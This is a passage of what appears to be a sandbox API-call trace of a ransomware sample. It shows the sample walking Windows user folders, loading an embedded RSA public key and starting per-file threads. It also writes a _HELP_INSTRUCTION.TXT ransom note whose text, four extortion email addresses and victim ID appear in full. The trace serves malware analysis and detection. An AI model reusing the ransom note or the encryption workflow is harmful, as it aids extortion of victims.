f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0139.314] lstrcpyW (in: lpString1=0x17cf1c, lpString2="Downloads.lnk" | out: lpString1="Downloads.lnk") returned="Downloads.lnk" [0139.314] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\Default\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Links\\") returned="\\\\?\\C:\\Users\\Default\\Links\\" [0139.314] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x7d0 [0139.314] Sleep (dwMilliseconds=0x96) [0139.469] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0139.469] lstrcmpW (lpString1="RecentPlaces.lnk", lpString2="..") returned 1 [0139.470] lstrcmpW (lpString1="RecentPlaces.lnk", lpString2=".") returned 1 [0139.470] StrStrW (lpFirst="RecentPlaces.lnk", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0139.470] StrStrW (lpFirst="RecentPlaces.lnk", lpSrch="ntldr") returned 0x0 [0139.470] StrStrW (lpFirst="RecentPlaces.lnk", lpSrch="NTLDR") returned 0x0 [0139.470] StrStrW (lpFirst="RecentPlaces.lnk", lpSrch="NTDETECT.COM") returned 0x0 [0139.470] StrStrW (lpFirst="RecentPlaces.lnk", lpSrch="ntdetect.com") returned 0x0 [0139.470] StrStrW (lpFirst="C:\\Users\\Default\\Links\\", lpSrch="Desktop") returned 0x0 [0139.470] StrStrW (lpFirst="C:\\Users\\Default\\Links\\", lpSrch="DESKTOP") returned 0x0 [0139.470] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Links\\") returned 27 [0139.470] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0139.470] lstrcpyW (in: lpString1=0x17cf1c, lpString2="RecentPlaces.lnk" | out: lpString1="RecentPlaces.lnk") returned="RecentPlaces.lnk" [0139.470] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\Default\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Links\\") returned="\\\\?\\C:\\Users\\Default\\Links\\" [0139.470] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x7d4 [0139.470] Sleep (dwMilliseconds=0x96) [0139.625] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0139.625] FindClose (in: hFindFile=0x3a6290 | out: hFindFile=0x3a6290) returned 1 [0139.626] FindClose (in: hFindFile=0x3a6290 | out: hFindFile=0x3a6290) returned 0 [0139.626] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Links" | out: lpString1="C:\\Users\\Default\\Links") returned="C:\\Users\\Default\\Links" [0139.626] lstrcatW (in: lpString1="C:\\Users\\Default\\Links", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Links\\*.*") returned="C:\\Users\\Default\\Links\\*.*" [0139.626] StrStrW (lpFirst="C:\\Users\\Default\\Links\\", lpSrch="Desktop") returned 0x0 [0139.626] StrStrW (lpFirst="C:\\Users\\Default\\Links\\", lpSrch="DESKTOP") returned 0x0 [0139.626] SetErrorMode (uMode=0x1) returned 0x1 [0139.626] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\Links\\_HELP_INSTRUCTION.TXT") returned 44 [0139.626] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0139.627] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0139.627] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x7d8) returned 0x0 [0139.627] RegQueryValueExW (in: hKey=0x7d8, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3d01d20, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x3d01d20*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0139.627] RegCloseKey (hKey=0x7d8) returned 0x0 [0139.627] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0139.627] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0139.627] CreateFileW (lpFileName="C:\\Users\\Default\\Links\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\links\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0139.628] CreateFileW (lpFileName="C:\\Users\\Default\\Links\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\links\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0139.630] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Links\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3a6290 [0139.630] PathFindFileNameW (pszPath="C:\\Users\\Default\\Links") returned="Links" [0139.630] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Links" | out: lpString1="Links") returned="Links" [0139.630] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0139.630] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0139.630] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0139.630] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0139.630] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0139.630] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0139.630] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0139.631] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0139.631] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0139.631] FindClose (in: hFindFile=0x3a6290 | out: hFindFile=0x3a6290) returned 1 [0139.631] FindClose (in: hFindFile=0x3a6290 | out: hFindFile=0x3a6290) returned 0 [0139.631] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0139.631] lstrcmpW (lpString1="Local Settings", lpString2="..") returned 1 [0139.631] lstrcmpW (lpString1="Local Settings", lpString2=".") returned 1 [0139.631] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0139.631] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0139.631] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Local Settings" | out: lpString1="C:\\Users\\Default\\Local Settings") returned="C:\\Users\\Default\\Local Settings" [0139.632] SetErrorMode (uMode=0x1) returned 0x1 [0139.632] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Local Settings" | out: lpString1="C:\\Users\\Default\\Local Settings") returned="C:\\Users\\Default\\Local Settings" [0139.632] lstrcatW (in: lpString1="C:\\Users\\Default\\Local Settings", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Local Settings\\") returned="C:\\Users\\Default\\Local Settings\\" [0139.632] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\Local Settings\\" | out: lpString1="C:\\Users\\Default\\Local Settings\\") returned="C:\\Users\\Default\\Local Settings\\" [0139.632] lstrcatW (in: lpString1="C:\\Users\\Default\\Local Settings\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Local Settings\\*.*") returned="C:\\Users\\Default\\Local Settings\\*.*" [0139.632] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Local Settings\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0139.632] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0139.632] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Local Settings" | out: lpString1="C:\\Users\\Default\\Local Settings") returned="C:\\Users\\Default\\Local Settings" [0139.632] lstrcatW (in: lpString1="C:\\Users\\Default\\Local Settings", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Local Settings\\*.*") returned="C:\\Users\\Default\\Local Settings\\*.*" [0139.632] StrStrW (lpFirst="C:\\Users\\Default\\Local Settings\\", lpSrch="Desktop") returned 0x0 [0139.632] StrStrW (lpFirst="C:\\Users\\Default\\Local Settings\\", lpSrch="DESKTOP") returned 0x0 [0139.632] SetErrorMode (uMode=0x1) returned 0x1 [0139.632] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\Local Settings\\_HELP_INSTRUCTION.TXT") returned 53 [0139.632] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0139.632] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0139.632] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x7dc) returned 0x0 [0139.633] RegQueryValueExW (in: hKey=0x7dc, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3d01f98, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x3d01f98*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0139.633] RegCloseKey (hKey=0x7dc) returned 0x0 [0139.633] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0139.633] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0139.633] CreateFileW (lpFileName="C:\\Users\\Default\\Local Settings\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\local settings\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0139.633] CreateFileW (lpFileName="C:\\Users\\Default\\Local Settings\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\local settings\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0139.635] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Local Settings\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0139.636] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0139.636] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0139.636] lstrcmpW (lpString1="Music", lpString2="..") returned 1 [0139.636] lstrcmpW (lpString1="Music", lpString2=".") returned 1 [0139.636] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0139.636] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0139.636] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Music" | out: lpString1="C:\\Users\\Default\\Music") returned="C:\\Users\\Default\\Music" [0139.636] SetErrorMode (uMode=0x1) returned 0x1 [0139.636] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Music" | out: lpString1="C:\\Users\\Default\\Music") returned="C:\\Users\\Default\\Music" [0139.636] lstrcatW (in: lpString1="C:\\Users\\Default\\Music", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Music\\") returned="C:\\Users\\Default\\Music\\" [0139.636] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\Music\\" | out: lpString1="C:\\Users\\Default\\Music\\") returned="C:\\Users\\Default\\Music\\" [0139.636] lstrcatW (in: lpString1="C:\\Users\\Default\\Music\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Music\\*.*") returned="C:\\Users\\Default\\Music\\*.*" [0139.636] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Music\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3a6290 [0139.636] PathFindFileNameW (pszPath="C:\\Users\\Default\\Music") returned="Music" [0139.636] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Music" | out: lpString1="Music") returned="Music" [0139.636] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0139.636] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0139.636] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0139.636] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0139.636] StrStrW (lpFirst="desktop.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0139.636] StrStrW (lpFirst="desktop.ini", lpSrch="ntldr") returned 0x0 [0139.636] StrStrW (lpFirst="desktop.ini", lpSrch="NTLDR") returned 0x0 [0139.636] StrStrW (lpFirst="desktop.ini", lpSrch="NTDETECT.COM") returned 0x0 [0139.636] StrStrW (lpFirst="desktop.ini", lpSrch="ntdetect.com") returned 0x0 [0139.637] StrStrW (lpFirst="C:\\Users\\Default\\Music\\", lpSrch="Desktop") returned 0x0 [0139.637] StrStrW (lpFirst="C:\\Users\\Default\\Music\\", lpSrch="DESKTOP") returned 0x0 [0139.637] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Music\\") returned 27 [0139.637] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0139.637] lstrcpyW (in: lpString1=0x17cf1c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0139.637] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\Default\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Music\\") returned="\\\\?\\C:\\Users\\Default\\Music\\" [0139.637] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x7e0 [0139.638] Sleep (dwMilliseconds=0x96) [0139.782] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0139.782] FindClose (in: hFindFile=0x3a6290 | out: hFindFile=0x3a6290) returned 1 [0139.782] FindClose (in: hFindFile=0x3a6290 | out: hFindFile=0x3a6290) returned 0 [0139.782] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Music" | out: lpString1="C:\\Users\\Default\\Music") returned="C:\\Users\\Default\\Music" [0139.782] lstrcatW (in: lpString1="C:\\Users\\Default\\Music", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Music\\*.*") returned="C:\\Users\\Default\\Music\\*.*" [0139.782] StrStrW (lpFirst="C:\\Users\\Default\\Music\\", lpSrch="Desktop") returned 0x0 [0139.782] StrStrW (lpFirst="C:\\Users\\Default\\Music\\", lpSrch="DESKTOP") returned 0x0 [0139.782] SetErrorMode (uMode=0x1) returned 0x1 [0139.782] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\Music\\_HELP_INSTRUCTION.TXT") returned 44 [0139.782] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0139.783] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0139.783] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x7e4) returned 0x0 [0139.783] RegQueryValueExW (in: hKey=0x7e4, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3d021c8, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x3d021c8*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0139.783] RegCloseKey (hKey=0x7e4) returned 0x0 [0139.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0139.783] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0139.783] CreateFileW (lpFileName="C:\\Users\\Default\\Music\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\music\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0139.783] CreateFileW (lpFileName="C:\\Users\\Default\\Music\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\music\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0139.783] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Music\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3a6290 [0139.783] PathFindFileNameW (pszPath="C:\\Users\\Default\\Music") returned="Music" [0139.783] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Music" | out: lpString1="Music") returned="Music" [0139.783] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0139.783] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0139.783] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0139.783] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0139.783] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0139.783] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0139.783] FindClose (in: hFindFile=0x3a6290 | out: hFindFile=0x3a6290) returned 1 [0139.784] FindClose (in: hFindFile=0x3a6290 | out: hFindFile=0x3a6290) returned 0 [0139.784] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0139.784] lstrcmpW (lpString1="My Documents", lpString2="..") returned 1 [0139.784] lstrcmpW (lpString1="My Documents", lpString2=".") returned 1 [0139.784] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0139.784] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0139.784] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="My Documents" | out: lpString1="C:\\Users\\Default\\My Documents") returned="C:\\Users\\Default\\My Documents" [0139.784] SetErrorMode (uMode=0x1) returned 0x1 [0139.784] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\My Documents" | out: lpString1="C:\\Users\\Default\\My Documents") returned="C:\\Users\\Default\\My Documents" [0139.784] lstrcatW (in: lpString1="C:\\Users\\Default\\My Documents", lpString2="\\" | out: lpString1="C:\\Users\\Default\\My Documents\\") returned="C:\\Users\\Default\\My Documents\\" [0139.784] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\My Documents\\" | out: lpString1="C:\\Users\\Default\\My Documents\\") returned="C:\\Users\\Default\\My Documents\\" [0139.784] lstrcatW (in: lpString1="C:\\Users\\Default\\My Documents\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\My Documents\\*.*") returned="C:\\Users\\Default\\My Documents\\*.*" [0139.784] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\My Documents\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0139.784] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0139.784] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\My Documents" | out: lpString1="C:\\Users\\Default\\My Documents") returned="C:\\Users\\Default\\My Documents" [0139.784] lstrcatW (in: lpString1="C:\\Users\\Default\\My Documents", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\My Documents\\*.*") returned="C:\\Users\\Default\\My Documents\\*.*" [0139.784] StrStrW (lpFirst="C:\\Users\\Default\\My Documents\\", lpSrch="Desktop") returned 0x0 [0139.784] StrStrW (lpFirst="C:\\Users\\Default\\My Documents\\", lpSrch="DESKTOP") returned 0x0 [0139.784] SetErrorMode (uMode=0x1) returned 0x1 [0139.784] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\My Documents\\_HELP_INSTRUCTION.TXT") returned 51 [0139.784] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0139.784] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0139.784] 